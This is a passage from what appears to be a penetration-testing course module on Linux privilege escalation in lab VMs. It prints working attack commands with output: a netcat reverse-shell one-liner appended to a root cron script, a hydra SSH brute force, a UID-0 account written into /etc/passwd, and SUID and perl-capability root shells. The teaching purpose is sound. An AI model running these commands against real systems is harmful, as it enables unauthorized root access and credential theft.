depends:        scsi_mod
retpoline:      Y
intree:         Y
name:           libata
vermagic:       4.19.0-21-amd64 SMP mod_unload modversions
sig_id:         PKCS#7
signer:         Debian Secure Boot CA
sig_key:        4B:6E:F5:AB:CA:66:98:25:17:8E:05:2C:84:66:7C:CB:C0:53:1F:8C
...
```

> Listing 19 - Displaying additional information about a module

Once we've obtained a list of drivers and their versions, we are better positioned to find any relevant exploits.

Later in this Module, we will explore various methods of privilege escalation. However, there are a few specific enumerations we should cover in this section that could reveal interesting "shortcuts" to privilege escalation.

Aside from the *rwx* file permissions described previously, two additional special rights pertain to executable files: *setuid* and *setgid*. These are symbolized with the letter "s".

If these two rights are set, either an uppercase or lowercase "s" will appear in the permissions. This allows the current user to execute the file with the rights of the *owner* (setuid) or the *owner's group* (setgid).

When running an executable, it normally inherits the permissions of the user that runs it. However, if the SUID permissions are set, the binary will run with the permissions of the file owner. This means that if a binary has the SUID bit set and the file is owned by root, any local user will be able to execute that binary with elevated privileges.

When a user or a system-automated script launches a SUID application, it inherits the UID/GID of its initiating script: this is known as effective UID/GID (eUID, eGID), which is the actual user that the OS verifies to grant permissions for a given action.

Any user who manages to subvert a setuid root program to call a command of their choice can effectively impersonate the root user and gains all rights on the system. Penetration testers regularly search for these types of files when they gain access to a system as a way of escalating their privileges.

We can use **find** to search for SUID-marked binaries. In this case, we are starting our search at the root directory (**/**), searching for files (**\-type f**) with the SUID bit set, (**\-perm -u=s**) and discarding all error messages (**2>/dev/null**):

```
joe@debian-privesc:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/ntfs-3g
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/bwrap
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
```

> Listing 20 - Searching for SUID files

In this case, the command found several SUID binaries. Exploitation of SUID binaries will vary based on several factors. For example, if **/bin/cp** (the *copy* command) were SUID, we could copy and overwrite sensitive files such as **/etc/passwd**.

A comprehensive list of Linux privilege escalation techniques can be found here:

- [compendium](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation) by g0tmi1k
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
- [HackTricks -Linux Privilege Escalation](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)

Having covered the main concepts behind manually enumerating Linux systems for privilege escalation techniques, we are going to learn how to automate the process in bulk in the upcoming section.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Manual Enumeration - VM #1

Linux Privilege Escalation - Manual Enumeration - VM #2

#### Labs

1. Connect to VM 1 with the provided credentials and replicate the manual enumeration techniques covered in this section. Inspect the target's OS information and its release details. What is the Linux distribution codename?

Answer

2. What *crontab* parameter is needed to list every cron job for the current user?

Answer

3. What is the inherited UID called that allows a given binary to be executed with root permissions even when launched by a lower-privileged user?

Answer

4. Connect to VM 2 with the provided credentials. The flag is inside one of the SUID binaries available on the system.

Answer

## 18.1.3. Automated Enumeration

As we learned in the previous section, Linux systems contain a wealth of information that can be used for further attacks. However, collecting this detailed information manually can be rather time-consuming. Fortunately, we can use various scripts to automate this process.

To get an initial baseline of the target system, we can use [*unix-privesc-check*](http://pentestmonkey.net/tools/audit/unix-privesc-check) on UNIX derivatives such as Linux. This Bash script is pre-installed on our local Kali machine at **/usr/bin/unix-privesc-check**, and it performs several checks to find any system misconfigurations that can be abused for local privilege escalation. We can review the tool's details by running the script without any arguments.

```
kali@kali:~$ unix-privesc-check
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

Usage: unix-privesc-check { standard | detailed }

"standard" mode: Speed-optimised check of lots of security settings.

"detailed" mode: Same as standard mode, but also checks perms of open file
                 handles and called files (e.g. parsed from shell scripts,
                 linked .so files).  This mode is slow and prone to false 
                 positives but might help you find more subtle flaws in 3rd
                 party programs.

This script checks file permissions and other settings that could allow
local users to escalate privileges.
...
```

> Listing 21 - Running unix\_privesc\_check

As shown in the listing above, the script supports "standard" and "detailed" mode. Based on the provided information, the standard mode appears to perform a speed-optimized process and should provide a reduced number of false positives. Therefore, in the following example we are going to transfer the script to the target system and use the standard mode to redirect the entire output to a file called **output.txt**.

```
joe@debian-privesc:~$ ./unix-privesc-check standard > output.txt
```

> Listing 22 - Running unix\_privesc\_check

The script performs numerous checks for permissions on common files. For example, the following excerpt reveals configuration files that are writable by non-root users:

```
Checking for writable config files
############################################
    Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
    Checking if anyone except root can change /etc/group
    Checking if anyone except root can change /etc/fstab
    Checking if anyone except root can change /etc/profile
    Checking if anyone except root can change /etc/sudoers
    Checking if anyone except root can change /etc/shadow
```

> Listing 23 - unix\_privesc\_check writable configuration files

This output reveals that anyone on the system can edit **/etc/passwd**. This is quite significant as it allows attackers to easily [elevate their privileges](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation) or create user accounts on the target. We will demonstrate this later in the Module.

There are many other tools worth mentioning that are specifically tailored for Linux privilege escalation information gathering, including [*LinEnum*](https://github.com/rebootuser/LinEnum) and [*LinPeas*](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS), which have been actively developed and enhanced over recent years.

Although these tools perform many automated checks, we should bear in mind that every system is different, and unique one-off system changes will often be missed by these types of tools. For this reason, it's important to check for unique configurations that can only be caught by manual inspection, as illustrated in the previous section.

In the next Learning Unit, we are going to learn how to act on the information we obtained through enumeration in order to elevate our privileges.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Automated Enumeration - VM #1

#### Labs

1. Connect to VM 1 with the provided credentials and run *unix-privesc-check* in standard mode. The flag is inside a file that normally should not be world-writable.

Answer

## 18.2. Exposed Confidential Information

This Learning Unit covers the following Learning Objectives:

- Understand User History Files
- Inspect User Trails for Credential Harvesting
- Inspect System Trails for Credential Harvesting

In this Learning Unit we are going to inspect how user and service history files constitute the initial stage of privilege escalation, often leading to the desired outcome.

## 18.2.1. Inspecting User Trails

As penetration testers, we are often time-constrained during our engagements. For this reason, we should focus our efforts first on low-hanging fruit.

One such target is users' history files. These files often hold clear-text user activity that might include sensitive information such as passwords or other authentication material.

On Linux systems, applications frequently store user-specific configuration files and subdirectories within a user's home directory. These files are often called [*dotfiles*](https://wiki.archlinux.org/title/Dotfiles) because they are prepended with a period. The prepended dot character instructs the system not to display these files when inspecting by basic listing commands.

One example of a dotfile is **.bashrc**. The **.bashrc** bash script is executed when a new terminal window is opened from an existing login session or when a new shell instance is started from an existing login session. From inside this script, additional environment variables can be specified to be automatically set whenever a new user's shell is spawned.

Sometimes system administrators store credentials inside environment variables as a way to interact with custom scripts that require authentication.

Reviewing our target Debian machine, we'll notice an unusual environment variable entry:

```
joe@debian-privesc:~$ env
...
XDG_SESSION_CLASS=user
TERM=xterm-256color
SCRIPT_CREDENTIALS=lab
USER=joe
LC_TERMINAL_VERSION=3.4.16
SHLVL=1
XDG_SESSION_ID=35
LC_CTYPE=UTF-8
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.118.2 59808 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
MAIL=/var/mail/joe
SSH_TTY=/dev/pts/1
OLDPWD=/home/joe/.cache
_=/usr/bin/env
```

> Listing 24 - Inspecting Environment Variables

Interestingly, the *SCRIPT\_CREDENTIALS* variable holds a value that resembles a password. To confirm that we are dealing with a permanent variable, we need to inspect the **.bashrc** configuration file.

```
joe@debian-privesc:~$ cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
export SCRIPT_CREDENTIALS="lab"
HISTCONTROL=ignoreboth
...
```

> Listing 25 - Inspecting .bashrc

From the above listing, we can confirm that the variable holding the password is exported when a user's shell is launched.

Storing a clear-text password inside an environment variable is not considered a secure best practice. To safely authenticate with an interactive script, it's recommended to adopt public key authentication and protect private keys with passphrases.

Let's first try to escalate our privileges by directly typing the newly-discovered password.

```
joe@debian-privesc:~$ su - root
Password:

root@debian-privesc:~# whoami
root
```

> Listing 26 - Becoming 'root' user with the leaked credential

Since we've successfully obtained root privileges, let's now try another privilege escalation route that is instead based on the environment variable credential finding.

Instead of aiming directly for the root account, we could try gaining access to the *eve* user we discovered during a previous section.

With our knowledge of script credentials, we could try building a custom dictionary derived from the known password to attempt brute forcing *eve*'s account.

We can do this by using the **crunch** command line tool to generate a custom wordlist. We'll set the minimum and maximum length to 6 characters, specify the pattern using the **\-t** parameter, then hard-code the first three characters to **Lab** followed by three numeric digits.

```
kali@kali:~$ crunch 6 6 -t Lab%%% > wordlist
```

> Listing 27 - Generating a wordlist for a bruteforce attack

We can then verify the content of the generated wordlist:

```
kali@kali:~$ cat wordlist
Lab000
Lab001
Lab002
Lab003
Lab004
Lab005
Lab006
Lab007
Lab008
Lab009
...
```

> Listing 28 - Inspecting the Wordlist Content

Since an SSH server is available on our target machine, we can try to attempt a remote brute force attack via Hydra. We'll supply the target username with the **\-l** parameter, our wordlist with **\-P**, the target IP address, and finally **ssh** as the target protocol. We will also include **\-V** to increase verbosity.

```
kali@kali:~$ hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-23 14:30:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:1/p:1000), ~250 tries per task
[DATA] attacking ssh://192.168.50.214:22/
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab000" - 1 of 1000 [child 0] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab001" - 2 of 1000 [child 1] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab002" - 3 of 1000 [child 2] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab003" - 4 of 1000 [child 3] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab004" - 5 of 1000 [child 2] (0/0)
...
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab120" - 121 of 1000 [child 0] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab121" - 122 of 1000 [child 3] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab122" - 123 of 1000 [child 2] (0/0)
[ATTEMPT] target 192.168.50.214 - login "eve" - pass "Lab123" - 124 of 1000 [child 1] (0/0)
[22][ssh] host: 192.168.50.214   login: eve   password: Lab123
1 of 1 target successfully completed, 1 valid password found
```

> Listing 29 - Successfully brute-forced eve's password

Our hydra brute forcing attack succeeded and we can now directly log in to the target machine with eve's credentials via SSH:

```
kali@kali:~$ ssh eve@192.168.50.214
eve@192.168.50.214's password:
Linux debian-privesc 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
...
eve@debian-privesc:~$
```

> Listing 30 - Successfully Logged in as eve

Once logged in as *eve*, we can verify if we are running as a privileged user by listing the sudo capabilities using the **sudo -l** command.

```
eve@debian-privesc:~$ sudo -l
[sudo] password for eve:
Matching Defaults entries for eve on debian-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eve may run the following commands on debian-privesc:
    (ALL : ALL) ALL
```

> Listing 31 - Inspecting sudo capabilities

Since *eve* seems to be an administrative account, we discover it can run any command as an elevated user. This means we can elevate directly to root by running *i* with sudo and supplying eve's credentials.

```
eve@debian-privesc:~$ sudo -i
[sudo] password for eve:

root@debian-privesc:/home/eve# whoami
root
```

> Listing 32 - Elevating to root

Great! We managed to elevate our privileges and gain administrative access via another route. In the next section, we will learn how to escalate privileges by harvesting system services credentials.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Inspecting User Tails - VM #1

Linux Privilege Escalation - Inspecting User Tails - VM #2

#### Labs

1. Connect to the VM 1 and repeat the steps learned in this section. Which command is used to list *sudoer* capabilities for a given user?

Answer

2. Connect to the VM 2 machine with the provided credentials and try to get the flag that resides under another user's file.

Answer

## 18.2.2. Inspecting Service Footprints

System [*daemons*](https://man7.org/linux/man-pages/man7/daemon.7.html) are Linux services that are spawned at boot time to perform specific operations without any need for user interaction. Linux servers are often configured to host numerous daemons, like SSH, web servers, and databases, to mention a few.

System administrators often rely on custom daemons to execute ad-hoc tasks, and they sometimes neglect security best practices.

As part of our enumeration efforts, we should inspect the behavior of running processes to hunt for any anomaly that might lead to an elevation of privileges.

Unlike on Windows systems, on Linux we can list information about higher-privilege processes such as the ones running inside the *root* user context.

We can enumerate all the running processes with the *ps* command and since it only takes a single snapshot of the active processes, we can refresh it using the *watch* command. In the following example, we will run the **ps** command every second via the **watch** utility and **grep** the results on any occurrence of the word "pass".

```
joe@debian-privesc:~$ watch -n 1 "ps -aux | grep pass"
...

joe      16867  0.0  0.1   6352  2996 pts/0    S+   05:41   0:00 watch -n 1 ps -aux | grep pass
root     16880  0.0  0.0   2384   756 ?        S    05:41   0:00 sh -c sshpass -p 'Lab123' ssh  -t eve@127.0.0.1 'sleep 5;exit'
root     16881  0.0  0.0   2356  1640 ?        S    05:41   0:00 sshpass -p zzzzzz ssh -t eve@127.0.0.1 sleep 5;exit
...
```

> Listing 33 - Harvesting Active Processes for Credentials

In Listing 33, we notice the administrator has configured a system daemon that is connecting to the local system with eve's credentials in clear text. Most importantly, the fact that the process is running as *root* does not prevent us from inspecting its activity.

Another more holistic angle we should take into consideration when enumerating for privilege escalation is to verify whether we have rights to capture network traffic.

*tcpdump* is the de facto command line standard for packet capture, and it requires administrative access since it operates on raw sockets. However, it's not uncommon to find IT personnel accounts have been given exclusive access to this tool for troubleshooting purposes.

To illustrate the concept, we can run tcpdump as the *joe* user who has been granted specific sudo permissions to run it.

tcpdump cannot be run without sudo permissions. That is because it needs to set up [raw sockets](https://man7.org/linux/man-pages/man7/raw.7.html) in order to capture traffic, which is a privileged operation.

Let's try to capture traffic in and out of the loopback interface, then dump its content in ASCII using the **\-A** parameter. Ultimately, we want to filter any traffic containing the "pass" keyword.

```
joe@debian-privesc:~$ sudo tcpdump -i lo -A | grep "pass"
[sudo] password for joe:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
...{...zuser:root,pass:lab -
...5...5user:root,pass:lab -
```

> Listing 34 - Using tcpdump to Perform Password Sniffing

After a few seconds we are prompted with the root user's clear text credentials. Nice!

These two examples provide an entry point for the many avenues available when hunting for leaked credentials. Having covered the low-hanging fruit, next we'll explore how to escalate privileges via misconfigured file permissions.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Inspecting Service Footprints - VM #1

Linux Privilege Escalation - Inspecting Service Footprints - VM #2

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section. Which utility is used to constantly inspect the output of the *ps* command?

Answer

2. Connect to VM 2 as the *joe* user and retrieve the flag using one of the methods explained in this section.

Answer

## 18.3. Insecure File Permissions

This Learning Unit covers the following Learning Objectives:

- Abuse Insecure Cron Jobs to Escalate Privileges
- Abuse Insecure File Permissions to Escalate Privileges

In this Learning Unit, we'll inspect how misconfigured file permissions might lead to different paths for privilege escalation.

## 18.3.1. Abusing Cron Jobs

Let's focus on another family of privilege escalation techniques and learn how to leverage insecure file permissions. For this section, we will assume that we have already gained access to our Linux target machine as an unprivileged user.

To leverage insecure file permissions, we must locate an executable file that not only allows us write access, but also runs at an elevated privilege level. On a Linux system, the [cron](https://en.wikipedia.org/wiki/Cron) time-based job scheduler is a prime target, since system-level scheduled jobs are executed with root user privileges and system administrators often create scripts for cron jobs with insecure permissions.

For this example, we will SSH into the VM 1 as the *joe* user, providing *offsec* as a password. In a previous section, we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (**/var/log/cron.log**) for running cron jobs:

```
joe@debian-privesc:~$ grep "CRON" /var/log/syslog
...
Aug 25 04:56:07 debian-privesc cron[463]: (CRON) INFO (pidfile fd = 3)
Aug 25 04:56:07 debian-privesc cron[463]: (CRON) INFO (Running @reboot jobs)
Aug 25 04:57:01 debian-privesc CRON[918]:  (root) CMD (/bin/bash /home/joe/.scripts/user_backups.sh)
Aug 25 04:58:01 debian-privesc CRON[1043]: (root) CMD (/bin/bash /home/joe/.scripts/user_backups.sh)
Aug 25 04:59:01 debian-privesc CRON[1223]: (root) CMD (/bin/bash /home/joe/.scripts/user_backups.sh)
```

> Listing 35 - Inspecting the cron log file

It appears that a script called **user\_backups.sh** under **/home/joe/** is executed in the context of the root user. Judging by the timestamps, it seems that this job runs once every minute.

Since we know the location of the script, we can inspect its contents and permissions.

```
joe@debian-privesc:~$ cat /home/joe/.scripts/user_backups.sh
#!/bin/bash

cp -rf /home/joe/ /var/backups/joe/

joe@debian-privesc:~$ ls -lah /home/joe/.scripts/user_backups.sh
-rwxrwxrw- 1 root root 49 Aug 25 05:12 /home/joe/.scripts/user_backups.sh
```

> Listing 36 - Showing the content and permissions of the user\_backups.sh script

The script itself is fairly straight-forward: it simply copies the user's **home** directory to the **backups** subdirectory. The [permissions](https://wiki.archlinux.org/index.php/File_permissions_and_attributes) of the script reveal that every local user can write to the file.

Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell [*one-liner*](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). If our plan works, we should receive a root-level reverse shell on our attacking machine after, at most, a one-minute period.

```
joe@debian-privesc:~$ cd .scripts

joe@debian-privesc:~/.scripts$ echo >> user_backups.sh

joe@debian-privesc:~/.scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh

joe@debian-privesc:~/.scripts$ cat user_backups.sh
#!/bin/bash

cp -rf /home/joe/ /var/backups/joe/

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
```

> Listing 37 - Inserting a reverse shell one-liner in user\_backups.sh

All we must do now is set up a listener on our Kali Linux machine and wait for the cron job to execute:

```
kali@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.214] 57698
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```

> Listing 38 - Getting a root shell from our target

As shown in the previous listing, the cron job did execute, as well as the reverse shell one-liner. We have successfully elevated our privileges and have access to a root shell on the target.

Although this was a simple example, it is not uncommon to find similar situations in the field since administrators are often more focused on pushing systems into production rather than securing script file permissions.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Abusing Cron Jobs - VM #1

Linux Privilege Escalation - Abusing Cron Jobs - VM #2

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which log file holds information about cron job activities? Include the full path in the answer.

Answer

2. Connect to VM 2 and look for another misconfigured cron job. Once found, exploit it and obtain a root shell in order to get a flag.

Answer

## 18.3.2. Abusing Password Authentication

Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in **/etc/shadow**, which is not readable by normal users. Historically however, password hashes, along with other account information, were stored in the world-readable file **/etc/passwd**. For backwards compatibility, if a password hash is present in the second column of an **/etc/passwd** user record, it is considered valid for authentication and it takes precedence over the respective entry in **/etc/shadow**, if available. This means that if we can write into **/etc/passwd**, we can effectively set an arbitrary password for any account.

Let's demonstrate this. In a previous section, we showed that our Debian client may be vulnerable to privilege escalation because the **/etc/passwd** permissions were not set correctly. To escalate our privileges, let's add another superuser (root2) and the corresponding password hash to **/etc/passwd**. We will first generate the password hash using the [**openssl**](https://github.com/openssl/openssl) tool and the **passwd** argument. By default, if no other option is specified, openssl will generate a hash using the [*crypt algorithm*](https://en.wikipedia.org/wiki/Crypt_\(C\)), a supported hashing mechanism for Linux authentication.

The output of the OpenSSL *passwd* command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format.

Once we have the generated hash, we will add a line to **/etc/passwd** using the appropriate format:

```
joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g

joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

joe@debian-privesc:~$ su root2
Password: w00t

root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)
```

> Listing 39 - Escalating privileges by editing /etc/passwd

As shown in Listing 39, the *root2* user and the *w00t* password hash in our **/etc/passwd** record were followed by the user id (UID) zero and the group id (GID) zero. These zero values specify that the account we created is a superuser Linux account. Finally, in order to verify that our modifications were valid, we used **su** to switch our standard user to the newly created *root2* account, then issued the **id** command to show that we indeed have *root* privileges.

Even though finding **/etc/passwd** world-writable might seem unlikely, many organizations implement hybrid integrations with third-party vendors that may compromise security for easier usability.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Abusing Password Authentication - VM #1

Linux Privilege Escalation - Abusing Password Authentication - VM #2

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which hashing algorithm has been used to encrypt the attacker's password?

Answer

2. Connect to VM 2 and get the flag by elevating to a root shell through password authentication abuse.

Answer

## 18.4. Insecure System Components

This Learning Unit covers the following Learning Objectives:

- Abuse SUID Programs and Capabilities for Privilege Escalation
- Circumvent Special Sudo Permissions to Escalate Privileges
- Enumerate the System's Kernel for Known Vulnerabilities, then Abuse them for Privilege Escalation

In this Learning Unit, we will explore how misconfigured system applications and permissions can also lead to elevation of rights.

## 18.4.1. Abusing Setuid Binaries and Capabilities

As we anticipated earlier in this Module, when not properly secured, setuid binaries can lead to attacks that elevate privileges.

Before attempting the actual exploitation technique, let's review the purpose behind a setuid binary using a brief example. When a user or a system-automated script launches a process, it inherits the UID/GID of its initiating script: this is known as the real UID/GID.

As previously discussed, user passwords are stored as hashes within **/etc/shadow**, which is owned and writable only by root (uid=0). How, then, can non-privileged users access this file to change their own password?

To circumvent this issue, the effective UID/GID was introduced, which represents the actual value being checked when performing sensitive operations.

To better demonstrate this concept, let's analyze the *passwd* program, which is responsible for changing the password for the user executing it. On the Debian lab machine, we'll connect as *joe* and execute the **passwd** command without typing anything afterwards, so that the process remains active in memory.

```
joe@debian-privesc:~$ passwd
Changing password for joe.
Current password:
```

> Listing 40 - Executing the passswd program

Leaving the program in standby, let's open another shell as *joe* to further inspect the process.

To find the PID (process ID) of the passwd program, we can list all processes and filter the output based on the target name:

```
joe@debian-privesc:~$ ps u -C passwd
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1932  0.0  0.1   9364  2984 pts/0    S+   01:51   0:00 passwd
```

> Listing 41 - Inspecting passwd's process credentials

Interestingly, passwd is running as the root user: this is needed for it to access and modify **/etc/shadow**.

We can also inspect the real UID and effective UID assigned for the process by inspecting the *proc* pseudo-filesystem, which allows us to interact with kernel information. Using the passwd's PID (1932) from the previous output, let's inspect the content at **/proc/1932/status**, which provides a summary of the process attributes:

```
joe@debian-privesc:~$ grep Uid /proc/1932/status
Uid:	1000	0	0	0
```

> Listing 42 - Inspecting passwd's process credentials

Filtering by the "Uid" keyword returns four parameters that correspond to the real, effective, saved set, and filesystem UIDs. In this case, the Real UID value is 1000, which is expected as it belongs to *joe*. However, the other three values, including the effective UID, equal the root's ID 0: let's consider why.

Under normal circumstances, all four values would belong to the same user who launched the executable. For instance, the bash process for *joe* (PID 1131 in this case) has the following values:

```
joe@debian-privesc:~$ cat /proc/1131/status | grep Uid
Uid:	1000	1000	1000	1000
```

> Listing 43 - Inspecting passwd's process credentials

The *passwd* binary behaves differently because the binary program has a special flag named Set-User-ID, or SUID in short. Let's inspect it:

```
joe@debian-privesc:~$ ls -asl /usr/bin/passwd
64 -rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
```

> Listing 44 - Revealing the SUID flag in the passwd binary application

The SUID flag is depicted with the **s** flag in the above output. This flag can be configured using the **chmod u+s <filename>** command and it sets the effective UID of the running process to the executable owner's user ID - in this case root's.

Using this technique results in a legitimate and constrained privilege escalation and because of this (as we'll learn shortly), the SUID binary must be bug-free to avoid any misuse of the application.

As a practical example, once we've completed manual or automated enumeration, we'll have discovered that the *find* utility is misconfigured and has the SUID flag set.

We can quickly abuse this vulnerability by running the *find* program to search any well-known file, like our own Desktop folder. Once the file is found, we can instruct *find* to perform any action through the *\-exec* parameter. In this case, we want to execute a bash shell along with the [*Set Builtin*](https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html) *\-p* parameter that is preventing the effective user from being reset.

```
joe@debian-privesc:~$ find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
bash-5.0# id
uid=1000(joe) gid=1000(joe) euid=0(root) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
bash-5.0# whoami
root
```

> Listing 45 - Getting a root shell by abusing SUID program

After running the command, we've obtained a root shell and we'll observe that although the UID still belongs to *joe*, the effective user ID is from *root*.

Another set of features subject to privilege escalation techniques are [*Linux capabilities*](https://man7.org/linux/man-pages/man7/capabilities.7.html).

Capabilities are extra attributes that can be applied to processes, binaries, and services to assign specific privileges normally reserved for administrative operations, such as traffic capturing or adding kernel modules. Similarly to setuid binaries, if misconfigured, these capabilities could allow an attacker to elevate their privileges to root.

To demonstrate these risks, let's try to manually enumerate our target system for binaries with capabilities. We are going to run **getcap** with the **\-r** parameter to perform a recursive search starting from the root folder **/**, filtering out any errors from the terminal output.

```
joe@debian-privesc:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

> Listing 46 - Manually Enumerating Capabilities

The two *perl* binaries stand out as they have *setuid* capabilities enabled, along with the *+ep* flag specifying that these capabilities are *effective* and *permitted*.

Even though they seem similar, capabilities, setuid, and the setuid flag are located in different places within the Linux ELF file format.

To exploit this capability misconfiguration, we could check the [*GTFOBins*](https://gtfobins.github.io/) website. This site provides an organized list of UNIX binaries and how can they be misused to elevate our privileges.

Searching for "Perl" on the GTFOBins website, we'll find precise instructions for which command to use to exploit capabilities. We'll use the whole command, which executes a shell along with a few POSIX directives enabling setuid.

```
joe@debian-privesc:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
perl: warning: Setting locale failed.
...
# id
uid=0(root) gid=1000(joe) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
```

> Listing 47 - Getting a root shell through capabilities exploitation

Great! We managed to gain a root shell via yet another misconfiguration vector.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #1

Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #2

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which utility can we use to manually search for misconfigured capabilities?

Answer

2. Connect to VM 2 and gain a root shell by abusing capabilities.

Answer

## 18.4.2. Abusing Sudo

On UNIX systems, the [*sudo*](https://man7.org/linux/man-pages/man8/sudo.8.html) utility can be used to execute a command with elevated privileges. To be able to use sudo, our low-privileged user account must be a member of the sudo group (on Debian based Linux distributions). The word "sudo" stands for "Superuser-Do", and we can think of it as changing the effective user-id of the executed command.

Custom configurations of sudo-related permissions can be applied in the [**/etc/sudoers**](https://man7.org/linux/man-pages/man5/sudoers.5.html) file. We can use the **\-l** or **\--list** option to list the allowed commands for the current user.

```
joe@debian-privesc:~$ sudo -l
[sudo] password for joe:
Matching Defaults entries for joe on debian-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User joe may run the following commands on debian-privesc:
    (ALL) (ALL) /usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get
```

> Listing 48 - Inspecting current user's sudo permissions

